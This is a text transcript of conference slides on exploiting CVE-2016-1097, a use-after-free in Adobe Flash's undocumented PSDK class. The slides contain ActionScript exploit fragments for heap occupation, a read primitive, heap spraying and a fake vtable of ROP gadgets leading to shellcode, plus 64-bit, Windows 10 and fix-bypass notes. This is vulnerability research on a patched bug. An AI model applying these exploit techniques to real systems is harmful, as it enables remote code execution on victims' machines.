Managed Runtime Speculative Execution Side Channel Mitigations
Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation...
Transcript of Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation...
Guanxing Wen
Use-After-Use-After-FreeExploit UAF by Genrating Your Own
✤ Security Researcher at Pangu LAB
✤ Enthusiastic about Flash: ✤ Advanced vulnerability exploitation ✤ Find vulnerabilities
About Me
CVE-2016-1097
@hhj4ck
Internet Bug Bounty
✤ Basis of Flash Exploition & Mitigation
✤ Overview of
Agenda
✤ Use-After-Use-After-Free (UAUAF): Go Beyond Mitigation
✤ Building the Exploit from Scratch
✤ Tips for 64-bit platform & Windows 10 Exploitation
✤ Conclusion
CVE-2016-1097
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvector vector
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvector
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
✤ Use-After-Free
vectorvector vector vectorvector vector
vector vectorvector vector
vectorvector vector vectorvector vector
vulnerable object
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
✤ Use-After-Free
vectorvector vector vectorvector vector
vector vectorvector vector
vectorvector vector vectorvector vector
vulnerable object
vectorvector vector vectorvector length
vector vectorvector vector
vectorvector vector vectorvector vector
vulnerable object
Flash Exploit
✤ Use-After-Free
length
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
Read Primitive
MMgc
Mitigations
vtablerefcount
dummydummy
dummy
01
buffer
length
data
Vector
Mitigations
MMgcvtable
refcount
dummydummy
dummy
01
buffer
length
data
Vector
MMgc
vtablerefcount
dummydummy
dummy
0
data
buffer
length
Vectorcookie
✤ length verification
Mitigations
vtablerefcount
capacitylength
array
copyOnWritecheck_array
check_length
vtablerefcount
capacitylength
array
copyOnWrite
check_capacity
check_copyOnWrite
ByteArray ByteArray
✤ length verification
StringBuffer LargeObjectTracker JSONSerializer DataList GCBitmap ZCT MMGCMetaData FastAllocator Code ByteArray
ByteArray & Vector
AS3 Objects
✤ Isolated Heap
Mitigations
MMgc
MMgc
ByteArray & Vector
AS3 Objects
✤ Isolated Heap
Mitigations
Free
mem
Mitigations
Heap Fengshui
Overflow
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
Proper Occupation
Invoke Virtual Method
Heap Fengshui
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
✤ Heap Overflow ✤ Use-After-Free
length verification
isolated heap
Mitigations
Heap Fengshui
Overflow
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
Proper Occupation
Invoke Virtual Method
Heap Fengshui
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
✤ Heap Overflow ✤ Use-After-Free
length verification
isolated heap
What is really necessary
What is really necessary
✤ Read Primitive
✤ buffer[index]✤ find ROP gadgets, wrappers
✤ index < 0xFFFFFFFF ?
What is really necessary
✤ Read Primitive
✤ buffer[index]✤ find ROP gadgets, wrappers
✤ index < 0xFFFFFFFF ?✤ buffer = Vector / ByteArray ?
vtablerefcount
lengthbuffer
…
String
vtablerefcount
lengthbuffer
…
String
vtablerefcount
4Address
…
vtablerefcount
4Address
…
vtablerefcount
4Address
…
Use-After-Use-After-Free
vtablerefcount
lengthbuffer
…
String obj.str is Read Primitive
vtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
vulnerableobject
vtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
vulnobj.funcX obj.funcYvtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
vtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
✤ Free: Vulnerable object is released
✤ Use: Occupied with selected object
Use-After-Use-After-Free
✤ Free: Release selected object (type confused call)
✤ Use: Modify the address field via occupation
✤ obj.str of becomes a Read Primitive
✤ Free: Release the memory for next occupation
Overview of CVE-2016-1097
✤ Introduced in Flash Player 19 beta✤ playerglobal.swc + FFDEC + Beyond Compare
com.adobe.tvsdk.mediacore.PSDK
com.adobe.tvsdk.mediacore.PSDK
✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Introduced in Flash Player 19 beta
✤ Introduced in Flash Player 19 beta
✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Buggy
com.adobe.tvsdk.mediacore.PSDK
✤ Introduced in Flash Player 19 beta
✤ Eliminated from Flash Player 19 release✤ Recurred in Flash 21 beta
✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Buggy
com.adobe.tvsdk.mediacore.PSDK
CVE-2016-1097
function poc() { var ps:PSDK = PSDK.pSDK; ps.release(); ps.createdispatcher(); }
constructed automatically
atom is remained
inner memory is freed
Exploit Development
PSDK Class
vtable1vtable2
dummydummy
dummydummydummydummy
ps.createDispatcher()…~PSDK()
0x20
Proper Occupation
com.adobe.mediacore.PSDK
ContentFactory
Proper Occupation
com.adobe.mediacore.PSDK
ContentFactory
Proper Occupation
com.adobe.mediacore.PSDK
MediaPlayer
metadata.MetaData
ContentFactory
Proper Occupation
com.adobe.mediacore.MediaPlayer
metadata.MetaData
Proper Occupation
com.adobe.mediacore.MediaPlayer
info.Track
Proper Occupation
com.adobe.mediacore.info.Track
Proper Occupation
Track name:String language:String( , )…
Proper Occupation
Trackvtablelength
lengthbuffer
bufferflags
--
name:String
language:String
vtable1vtable2
dummydummy
dummydummydummydummy
Type Confusion Call
ps.createDispatcher()PSDK
vtablelength
lengthbuffer
bufferflags
--
Track
ps.createDispatcher() vtablelength
lengthbuffer
bufferflags
--
Track
Type Confusion Call
vtable1vtable2
dummydummy
dummydummydummydummy
Type Confusion Call
ps.createDispatcher()PSDK
vtablelength
lengthbuffer
bufferflags
--
Trackvtable1vtable2
dummydummy
dummydummydummydummy
Type Confusion Call
ps.createDispatcher()PSDK
vtable1
lengthj
bufferflags
--
Trackvtable1vtable2
dummydummy
dummydummydummydummy
Type Confusion Call
ps.createDispatcher()PSDK
vtable0
lengthj
bufferflags
--
Trackvtable1vtable2
dummydummy
dummydummydummydummy
Type Confusion Call
ps.createDispatcher() vtable1vtable2
dummydummy
dummydummydummydummy
PSDKvtablelength
lengthbuffer
bufferflags
--
Track
vtablelength
lengthbuffer
bufferflags
--
Track
Type Confusion Call
Metadata.setByteArray(key:String, obj:ByteArray)
Metadata.setByteArray
✤ Alloc a temporary space
✤ Release the temporary space
✤ Do some calculation
var mt:Metadata = new Metadata(); var bytes:ByteArray = new ByteArray(); bytes.length = 0x20; bytes.postion = 0x0C; bytes.writeInt(4); var ps:PSDK = PSDK.pSDK; ps.release(); var track:Track = new Track("j","lan",true,true); ps.createDispatcher();
proper occupation
release the memory block of Track
bytes.writeInt(4); var ps:PSDK = PSDK.pSDK; ps.release(); var track:Track = new Track("j","lan",true,true); ps.createDispatcher();
bytes.postion = 0x10; bytes.writeUnsignedInt(0xadd7e555); mt.setByteArray("address", bytes); res = track.language; value = (res.charCodeAt(3)<<24) value|= (res.charCodeAt(2)<<16) value|= (res.charCodeAt(1)<<8) value|= (res.charCodeAt(0));
Read Primitive
Code Execution
✤ Spray with Vector.<this> public function spray():void { gc_arr=new Array(); var len=(0x1000-0x28)/4; for(var i=0;i<0x10000;i++) { gc_arr[i]=new Vector.<Object>(); for(var j=0;j<len;j++) gc_arr[i][j]=this;
} }
Code Execution
✤ Spray with Vector.<this>
this atom
public function spray():void { gc_arr=new Array(); var len=(0x1000-0x28)/4; for(var i=0;i<0x10000;i++) { gc_arr[i]=new Vector.<Object>(); for(var j=0;j<len;j++) gc_arr[i][j]=this;
} }
Code Execution
✤ Find buffers through *this (HT tricks)
Code Execution
✤ Find buffers through *this (HT tricks)
Code Execution
✤ Find buffers through *this (HT tricks)
var ulimit_bytes:ByteArray; var output:String; var track:Track; var gc_arr:Array; var fill_bytes:ByteArray; var shellcode:ByteArray;
vtable1vtable2
dummydummy
dummydummydummydummy
Code Execution
✤ Build a fake vtable with gadgets
~PSDK()
Code Execution
✤ Build a fake vtable with gadgets
xchg eax, esp # pop esi # pop ebx # retnxchg eax, esi # retnpush 1 # push [eax-8] # push [eax-4] # call wrapper
jump to shellcode
=> esi~PSDK()
DEMO
64-bit Exploit
ps = PSDK.pSDK; proper occupation
release the memory of MediaResource
ps.release(); ms = new MediaResource("jack", 0x54336677, null); try{ ps.createDefaultContentFactory(); }catch(e:Error){}
64-bit Exploit
64-bit Exploit
var bytes:ByteArray = new ByteArray(); bytes.endian = "littleEndian"; bytes.position = 0x30; bytes.writeInt(1); mt.setByteArray("jack", bytes);
ps = PSDK.pSDK;
ps.release(); ms = new MediaResource("jack", 0x54336677, null); try{ ps.createDefaultContentFactory(); }catch(e:Error){}
64-bit Exploit
✤ Heap Spray MMgc Object
64-bit Exploit
✤ Heap Spray malloced Objectsgc_arr = new Array(); ad = new AdClick("","",""); ms = new MediaResource("jack",0x54336677,null); mt = new MetaData(); for(var i=0;i<0x80000;i++) { gc_arr[i]=new AdAsset("",1,ms,ad,mt); }
64-bit Exploit
✤ Heap Spray malloced Objects
Metadata
Flag
64-bit Exploit
Metadata
+0 vtable+8 dumy
…+10 dumy
+120 ptr
64-bit Exploit
Metadata
+0 vtable+8 dumy
…+10 dumy
+120 ptr
+0 dumy…
+hash*8
+0 dumy+8 dumy+10 ptr
+0 dumy+8 dumy+10 dumy+18 ptr bytes
hash = func(name) hash = [0,7] hash("vtable") = 3 hash("shellc0de") = 4 hash("param") = 0
.setByteArray(name, bytes);
Windows 10 Tips
✤ PSDK is malloced ✤ LFH randomisation✤ Multiple occupation
ps.release(); for(i=0;i<0x100;i++) track = new Track("j","lan",true,true); ps.createAdPolicySelector(1,mp);
Windows 10 Tips
1
Conclusion
✤ The Fix✤ remove the reference manually after release()
✤ bypass: declare two of them (CVE-2016-4248)
✤ remove the release() from AS3 level ✤ Use-After-Use-After-Free
✤ relatively common way to retrieve a Read Primitive✤ replace String with other structure ?= Write Primitive
✤ Memory Protector has no effects
Q & A
Thanks for your attention
Download everything from: http://www.hhjack.com/psdk.zip